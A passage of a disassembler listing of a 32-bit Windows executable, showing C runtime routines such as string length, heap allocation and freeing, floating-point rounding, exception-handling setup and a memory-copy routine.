mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_417A9F: ; CODE XREF: sub_4179D0+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_417AA8: ; CODE XREF: sub_4179D0+72�j
; sub_4179D0+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_4179D0 endp
; =============== S U B R O U T I N E =======================================
sub_417AB0 proc near ; CODE XREF: sub_4023A7+1A7�p
; sub_4023A7:loc_402561�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_417AD0
loc_417ABC: ; CODE XREF: sub_417AB0+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_417B03
test ecx, 3
jnz short loc_417ABC
add eax, 0
loc_417AD0: ; CODE XREF: sub_417AB0+A�j
; sub_417AB0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_417AD0
mov eax, [ecx-4]
test al, al
jz short loc_417B21
test ah, ah
jz short loc_417B17
test eax, 0FF0000h
jz short loc_417B0D
test eax, 0FF000000h
jz short loc_417B03
jmp short loc_417AD0
; ---------------------------------------------------------------------------
loc_417B03: ; CODE XREF: sub_417AB0+11�j
; sub_417AB0+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_417B0D: ; CODE XREF: sub_417AB0+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_417B17: ; CODE XREF: sub_417AB0+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_417B21: ; CODE XREF: sub_417AB0+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_417AB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417B30 proc near ; CODE XREF: sub_402688+8�p
; sub_402B84+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_417B50
loc_417B3C: ; CODE XREF: sub_417B30+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_417B3C
loc_417B50: ; CODE XREF: sub_417B30+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_417B30 endp
; =============== S U B R O U T I N E =======================================
sub_417B5F proc near ; CODE XREF: sub_4029E9+7A�p
; sub_4029E9+8A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, eax
cmp word ptr [eax], 0
jz short loc_417B73
loc_417B6B: ; CODE XREF: sub_417B5F+12�j
inc ecx
inc ecx
cmp word ptr [ecx], 0
jnz short loc_417B6B
loc_417B73: ; CODE XREF: sub_417B5F+A�j
mov edx, [esp+arg_4]
push esi
loc_417B78: ; CODE XREF: sub_417B5F+26�j
mov si, [edx]
mov [ecx], si
inc ecx
inc ecx
inc edx
inc edx
test si, si
jnz short loc_417B78
pop esi
retn
sub_417B5F endp
; =============== S U B R O U T I N E =======================================
sub_417B89 proc near ; CODE XREF: sub_402B84+220�p
; sub_402DD7+C1�p ...
arg_0 = dword ptr 4
push ds:dword_4CDA14
push [esp+4+arg_0]
call sub_417B9B
pop ecx
pop ecx
retn
sub_417B89 endp
; =============== S U B R O U T I N E =======================================
sub_417B9B proc near ; CODE XREF: sub_417B89+A�p
; sub_4185F5+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_417BC4
loc_417BA2: ; CODE XREF: sub_417B9B+27�j
push [esp+arg_0]
call sub_417BC7
test eax, eax
pop ecx
jnz short locret_417BC6
cmp [esp+arg_4], eax
jz short locret_417BC6
push [esp+arg_0]
call sub_41AB54
test eax, eax
pop ecx
jnz short loc_417BA2
loc_417BC4: ; CODE XREF: sub_417B9B+5�j
xor eax, eax
locret_417BC6: ; CODE XREF: sub_417B9B+13�j
; sub_417B9B+19�j
retn
sub_417B9B endp
; =============== S U B R O U T I N E =======================================
sub_417BC7 proc near ; CODE XREF: sub_417B9B+B�p
arg_0 = dword ptr 4
mov eax, ds:dword_4CF028
push esi
mov esi, [esp+4+arg_0]
cmp eax, 3
jnz short loc_417BEB
cmp esi, ds:dword_4CF020
ja short loc_417C1D
push esi
call sub_41B0DD
test eax, eax
pop ecx
jz short loc_417C1D
pop esi
retn
; ---------------------------------------------------------------------------
loc_417BEB: ; CODE XREF: sub_417BC7+D�j
cmp eax, 2
jnz short loc_417C1D
mov eax, [esp+4+arg_0]
test eax, eax
jz short loc_417C00
lea esi, [eax+0Fh]
and esi, 0FFFFFFF0h
jmp short loc_417C03
; ---------------------------------------------------------------------------
loc_417C00: ; CODE XREF: sub_417BC7+2F�j
push 10h
pop esi
loc_417C03: ; CODE XREF: sub_417BC7+37�j
cmp esi, ds:dword_435EB4
ja short loc_417C2A
mov eax, esi
shr eax, 4
push eax
call sub_41BB80
test eax, eax
pop ecx
jnz short loc_417C39
jmp short loc_417C2A
; ---------------------------------------------------------------------------
loc_417C1D: ; CODE XREF: sub_417BC7+15�j
; sub_417BC7+20�j ...
test esi, esi
jnz short loc_417C24
push 1
pop esi
loc_417C24: ; CODE XREF: sub_417BC7+58�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_417C2A: ; CODE XREF: sub_417BC7+42�j
; sub_417BC7+54�j
push esi
push 0
push ds:dword_4CF024
call ds:dword_4240E8 ;; RtlAllocateHeap
loc_417C39: ; CODE XREF: sub_417BC7+52�j
pop esi
retn
sub_417BC7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417C3B proc near ; CODE XREF: sub_402DD7+10E�p
; sub_402DD7+116�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_417CA1
mov eax, ds:dword_4CF028
cmp eax, 3
jnz short loc_417C67
push esi
call sub_41AD89
pop ecx
test eax, eax
push esi
jz short loc_417C93
push eax
call sub_41ADB4
pop ecx
pop ecx
jmp short loc_417CA1
; ---------------------------------------------------------------------------
loc_417C67: ; CODE XREF: sub_417C3B+14�j
cmp eax, 2
jnz short loc_417C92
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_4]
push eax
push esi
call sub_41BAE4
add esp, 0Ch
test eax, eax
jz short loc_417C92
push eax
push [ebp+arg_0]
push [ebp+var_4]
call sub_41BB3B
add esp, 0Ch
jmp short loc_417CA1
; ---------------------------------------------------------------------------
loc_417C92: ; CODE XREF: sub_417C3B+2F�j
; sub_417C3B+44�j
push esi
loc_417C93: ; CODE XREF: sub_417C3B+20�j
push 0
push ds:dword_4CF024
call ds:dword_4240E4 ;; RtlFreeHeap
loc_417CA1: ; CODE XREF: sub_417C3B+A�j
; sub_417C3B+2A�j ...
pop esi
leave
retn
sub_417C3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_417CA4(double)
sub_417CA4 proc near ; CODE XREF: sub_403FE6+38�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push ds:dword_433C30
call sub_41C77D
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_417D2A
call sub_41C645
pop ecx
test eax, eax
pop ecx
jle short loc_417D0D
cmp eax, 2
jle short loc_417CFF
cmp eax, 3
jnz short loc_417D0D
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Bh ; double
call sub_41BF55
add esp, 10h
jmp short loc_417D6F
; ---------------------------------------------------------------------------
loc_417CFF: ; CODE XREF: sub_417CA4+3F�j
push esi
push ebx
call sub_41C77D
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_417D6F
; ---------------------------------------------------------------------------
loc_417D0D: ; CODE XREF: sub_417CA4+3A�j
; sub_417CA4+44�j
fld [ebp+arg_0]
fadd ds:dbl_4246A8
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Bh
push 8
jmp short loc_417D67
; ---------------------------------------------------------------------------
loc_417D2A: ; CODE XREF: sub_417CA4+2F�j
call sub_41C60A
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_417D4D
loc_417D3F: ; CODE XREF: sub_417CA4+AC�j
push esi
push ebx
call sub_41C77D
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_417D6F
; ---------------------------------------------------------------------------
loc_417D4D: ; CODE XREF: sub_417CA4+99�j
test bl, 20h
jnz short loc_417D3F
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Bh ; int
push 10h ; int
loc_417D67: ; CODE XREF: sub_417CA4+84�j
call sub_41BFA8
add esp, 1Ch
loc_417D6F: ; CODE XREF: sub_417CA4+59�j
; sub_417CA4+67�j ...
pop esi
pop ebx
leave
retn
sub_417CA4 endp
; =============== S U B R O U T I N E =======================================
sub_417D73 proc near ; CODE XREF: sub_419AB8+9�p
; sub_41C846+21�p
; DATA XREF: ...
call sub_417D8B
call sub_41C846
mov ds:dword_4CD994, eax
call sub_41C7F6
fnclex
retn
sub_417D73 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_417D8B proc near ; CODE XREF: sub_417D73�p
mov eax, offset sub_41CC34
mov ds:off_435FD4, offset sub_41C8C9
mov ds:off_435FD0, eax
mov ds:off_435FD8, offset sub_41C92F
mov ds:off_435FDC, offset sub_41C86F
mov ds:off_435FE0, offset sub_41C917
mov ds:off_435FE4, eax
retn
sub_417D8B endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417DC4 proc near ; CODE XREF: sub_403FE6+1B�p
; sub_403FE6+44�p ...
var_C = qword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
fstcw [ebp+var_2]
wait
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [ebp+var_C]
fldcw [ebp+var_2]
mov eax, dword ptr [ebp+var_C]
mov edx, dword ptr [ebp+var_C+4]
leave
retn
sub_417DC4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_417DEB(double)
sub_417DEB proc near ; CODE XREF: sub_404032+82�p
; sub_40494F+3A1�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push ds:dword_433C48
call sub_41C77D
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_417E71
call sub_41C645
pop ecx
test eax, eax
pop ecx
jle short loc_417E54
cmp eax, 2
jle short loc_417E46
cmp eax, 3
jnz short loc_417E54
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Ch ; double
call sub_41BF55
add esp, 10h
jmp short loc_417EB6
; ---------------------------------------------------------------------------
loc_417E46: ; CODE XREF: sub_417DEB+3F�j
push esi
push ebx
call sub_41C77D
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_417EB6
; ---------------------------------------------------------------------------
loc_417E54: ; CODE XREF: sub_417DEB+3A�j
; sub_417DEB+44�j
fld [ebp+arg_0]
fadd ds:dbl_4246A8
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_417EAE
; ---------------------------------------------------------------------------
loc_417E71: ; CODE XREF: sub_417DEB+2F�j
call sub_41C60A
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_417E94
loc_417E86: ; CODE XREF: sub_417DEB+AC�j
push esi
push ebx
call sub_41C77D
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_417EB6
; ---------------------------------------------------------------------------
loc_417E94: ; CODE XREF: sub_417DEB+99�j
test bl, 20h
jnz short loc_417E86
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_417EAE: ; CODE XREF: sub_417DEB+84�j
call sub_41BFA8
add esp, 1Ch
loc_417EB6: ; CODE XREF: sub_417DEB+59�j
; sub_417DEB+67�j ...
pop esi
pop ebx
leave
retn
sub_417DEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417EBA proc near ; CODE XREF: sub_41D0A5+71�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_417EBA endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_417EEE proc near ; CODE XREF: sub_41D256+199�p
; sub_41D41A+3E�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_417EEE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417EF5 proc near ; CODE XREF: sub_41D256+17F�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_417EF5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417EFC proc near ; CODE XREF: sub_4180AE+5C�p
; sub_41D0A5:loc_41D0D6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov eax, large fs:0
mov [ebp+var_8], eax
mov [ebp+var_4], offset loc_417F24
push 0
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+arg_0]
call sub_422A4C ; RtlUnwind
loc_417F24: ; DATA XREF: sub_417EFC+11�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and al, 0FDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, large fs:0
mov ebx, [ebp+var_8]
mov [ebx], eax
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_417EFC endp
; ---------------------------------------------------------------------------
loc_417F4B: ; CODE XREF: _0:004230EC�j _0:00423109�j ...
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41CCAA
add esp, 20h
mov [ebp+14h], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+14h]
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F81 proc near ; CODE XREF: sub_41D120+73�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
mov [ebp+var_10], offset sub_417FD5
inc eax
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_41D4B0
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_417F81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417FD5 proc near ; DATA XREF: sub_417F81+16�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cld
mov eax, [ebp+arg_4]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41CCAA
add esp, 20h
pop ebp
retn
sub_417FD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417FFA proc near ; CODE XREF: sub_41CEEC+25�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_4180AE
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_418080
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call ds:dword_4CDA38
pop ecx
pop ecx
and [ebp+var_34], 0
loc_418080: ; DATA XREF: sub_417FFA+3C�o
cmp [ebp+var_4], 0
jz short loc_41809D
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_4180A6
; ---------------------------------------------------------------------------
loc_41809D: ; CODE XREF: sub_417FFA+8A�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_4180A6: ; CODE XREF: sub_417FFA+A1�j
mov eax, [ebp+var_34]
pop edi
pop esi
pop ebx
leave
retn
sub_417FFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4180AE proc near ; DATA XREF: sub_417FFA+D�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_4180D1
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
push 1
pop eax
jmp short loc_41811E
; ---------------------------------------------------------------------------
loc_4180D1: ; CODE XREF: sub_4180AE+12�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41CCAA
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_41810F
push [ebp+arg_0]
push [ebp+arg_4]
call sub_417EFC
loc_41810F: ; CODE XREF: sub_4180AE+54�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
push 1
pop eax
loc_41811E: ; CODE XREF: sub_4180AE+21�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4180AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418123 proc near ; CODE XREF: sub_41CD45+C6�p
; sub_41CEEC+43�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
cmp [ebp+arg_4], 0
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+arg_0], esi
mov [ebp+var_4], eax
jl short loc_41817A
loc_418141: ; CODE XREF: sub_418123+52�j
cmp esi, 0FFFFFFFFh
jnz short loc_41814B
call sub_41D552
loc_41814B: ; CODE XREF: sub_418123+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
cmp [ebx+eax*4+4], ecx
lea eax, [ebx+eax*4]
jge short loc_418160
cmp ecx, [eax+8]
jle short loc_418165
loc_418160: ; CODE XREF: sub_418123+36�j
cmp esi, 0FFFFFFFFh
jnz short loc_418171
loc_418165: ; CODE XREF: sub_418123+3B�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_418171: ; CODE XREF: sub_418123+40�j
cmp [ebp+arg_4], 0
jge short loc_418141
mov eax, [ebp+var_4]
loc_41817A: ; CODE XREF: sub_418123+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_41818E
cmp esi, eax
jbe short loc_418193
loc_41818E: ; CODE XREF: sub_418123+65�j
call sub_41D552
loc_418193: ; CODE XREF: sub_418123+69�j
lea eax, [esi+esi*4]
pop edi
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_418123 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4181A0 proc near ; CODE XREF: sub_41F774+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4181B8
push [ebp+arg_0]
call sub_422A4C ; RtlUnwind
loc_4181B8: ; DATA XREF: sub_4181A0+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4181A0 endp
; =============== S U B R O U T I N E =======================================
sub_4181C0 proc near ; DATA XREF: sub_4181E2+A�o
; sub_41824A+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4181E1
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4181E1: ; CODE XREF: sub_4181C0+10�j
retn
sub_4181C0 endp
; =============== S U B R O U T I N E =======================================
sub_4181E2 proc near ; CODE XREF: sub_41D1C6+D�p
; sub_41F774+67�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4181C0
push large dword ptr fs:0
mov large fs:0, esp
loc_4181FF: ; CODE XREF: sub_4181E2:loc_41823A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41823C
cmp esi, [esp+1Ch+arg_4]
jz short loc_41823C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_41823A
push 101h
mov eax, [ebx+esi*4+8]
call sub_418276
call dword ptr [ebx+esi*4+8]
loc_41823A: ; CODE XREF: sub_4181E2+44�j
jmp short loc_4181FF
; ---------------------------------------------------------------------------
loc_41823C: ; CODE XREF: sub_4181E2+2A�j
; sub_4181E2+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4181E2 endp
; =============== S U B R O U T I N E =======================================
sub_41824A proc near ; CODE XREF: sub_41D1E6+37�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4181C0
jnz short locret_41826C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_41826C
mov eax, 1
locret_41826C: ; CODE XREF: sub_41824A+10�j
; sub_41824A+1B�j
retn
sub_41824A endp
; =============== S U B R O U T I N E =======================================
sub_41826D proc near ; CODE XREF: sub_41D4B0+1E�p
; sub_41D4B0+40�p
push ebx
push ecx
mov ebx, offset dword_433C4C
jmp short loc_418280
sub_41826D endp
; =============== S U B R O U T I N E =======================================
sub_418276 proc near ; CODE XREF: sub_4181E2+4F�p
; sub_41F774+78�p
push ebx
push ecx
mov ebx, offset dword_433C4C
mov ecx, [ebp+8]
loc_418280: ; CODE XREF: sub_41826D+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_418276 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418290 proc near ; CODE XREF: sub_404032+5�p
; sub_4041D4+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_418290 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4182AF proc near ; CODE XREF: sub_404667+26�p
; _0:004227E2�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_417C3B
pop ecx
retn
sub_4182AF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4182C0 proc near ; CODE XREF: sub_4046D8+3A�p
; sub_41ADB4+2EF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4182E0
cmp edi, eax
jb loc_418458
loc_4182E0: ; CODE XREF: sub_4182C0+16�j
test edi, 3
jnz short loc_4182FC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41831C
rep movsd
jmp off_418408[edx*4]
; ---------------------------------------------------------------------------
loc_4182FC: ; CODE XREF: sub_4182C0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_418314
and eax, 3
add ecx, eax
jmp dword ptr loc_41831C+4[eax*4]
; ---------------------------------------------------------------------------
loc_418314: ; CODE XREF: sub_4182C0+46�j
jmp dword ptr loc_418418[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41831C: ; CODE XREF: sub_4182C0+31�j
; sub_4182C0+8E�j ...
jmp off_41839C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41832C+4
dd offset loc_41835C
; ---------------------------------------------------------------------------
loc_41832C: ; DATA XREF: sub_4182C0+64�o
add byte ptr [ebx-2EDCFFBFh], 8Ah
push es
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41831C
rep movsd
jmp off_418408[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41835C: ; DATA XREF: sub_4182C0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41831C
rep movsd
jmp off_418408[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_41831C
rep movsd
jmp off_418408[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41839C dd offset loc_4183FF ; DATA XREF: sub_4182C0:loc_41831C�r
